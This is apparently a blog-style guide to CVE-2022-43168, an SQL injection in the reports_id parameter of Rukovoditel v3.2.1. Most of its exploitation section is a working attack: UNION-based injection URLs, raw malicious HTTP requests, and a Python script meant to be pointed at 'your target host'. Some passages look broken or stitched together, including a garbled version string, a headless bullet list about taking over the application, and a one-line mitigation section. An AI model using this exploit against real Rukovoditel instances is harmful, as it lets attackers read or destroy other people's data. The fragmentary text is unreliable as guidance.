CVE-2022-43168 - Exploiting SQL Injection in Rukovoditel v3.2.1 (Full Guide & PoC)

Rukovoditel, a popular open-source project management tool, is widely used across companies and teams for collaborative project tracking. In October 2022, a serious SQL injection vulnerability (CVE-2022-43168) was discovered in version 3.2.1 of Rukovoditel. This flaw allows attackers to execute arbitrary SQL queries through the reports_id parameter, potentially exposing or destroying sensitive data.

In this long read, we break down what CVE-2022-43168 is, how it works, demonstrate how you can exploit it, and explain how to mitigate the issue. This guide will be easy to follow, even if you’re new to web vulnerabilities.

What is CVE-2022-43168?

CVE-2022-43168 is a SQL Injection vulnerability found in Rukovoditel v3.2.1. The vulnerable parameter is called reports_id and appears in several endpoints, including URLs related to report generation.

The flaw happens because the application doesn’t properly sanitize user-supplied input. Unsanitized user input gets inserted into a SQL query, allowing attackers to "inject" their own SQL code.

The vulnerable parameter, reports_id, is found in requests like

GET /index.php?module=ext/reports/print_report&reports_id=xxx

Here, the input passed via reports_id is directly used in a SQL statement.

Exploiting CVE-2022-43168 (Proof of Concept)

Let’s see how an attacker might use this vulnerability.

Assume a page where you can export or print reports. The URL looks like this

http://example.com/index.php?module=ext/reports/print_report&reports_id=5

If you change the reports_id parameter to something malicious, like

http://example.com/index.php?module=ext/reports/print_report&reports_id=5+UNION+SELECT+1,version(),3--

Original request

GET /index.php?module=ext/reports/print_report&reports_id=5 HTTP/1.1
Host: example.com

Malicious request

GET /index.php?module=ext/reports/print_report&reports_id=5+UNION+SELECT+1,version(),3-- -
Host: example.com

If successful, instead of printing report with ID=5, the server will execute

SELECT ... FROM ... WHERE reports_id = 5 UNION SELECT 1, version(), 3-- -

What happens:
The page may now show "MySQL 8..31" (or similar), leaking critical database information.

Here’s a simple exploit using Python and requests

import requests

# Target info
base_url = 'http://example.com/index.php';
params = {
    'module': 'ext/reports/print_report',
    'reports_id': "5 UNION SELECT 1,version(),3-- -"
}

r = requests.get(base_url, params=params)
print(r.text)  # Look for the database version in the output

Note: Replace example.com with your target host.

Modify, delete, or create database entries

- Take over the entire application/data

References

- CVE-2022-43168 at NVD
- Original advisory on GitHub
- Exploit Database Entry

Update Rukovoditel:

The developers patched this in later versions. If you are running v3.2.1, update to the latest version from the official site.

Conclusion

CVE-2022-43168 is a critical SQL injection vulnerability in Rukovoditel v3.2.1, stemming from poor input sanitization in the reports_id parameter. Any team running this software should update immediately.

Exploiting this bug can be as simple as a crafted URL. Fixes are available, so patch your instance!

Stay safe and proactive when it comes to web application security.

*This article is exclusive and aims to provide a clear, practical guide for understanding and dealing with CVE-2022-43168 in Rukovoditel v3.2.1. For further details, always consult official documentation and security advisories.*

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 11/01/2022 12:50:00 UTC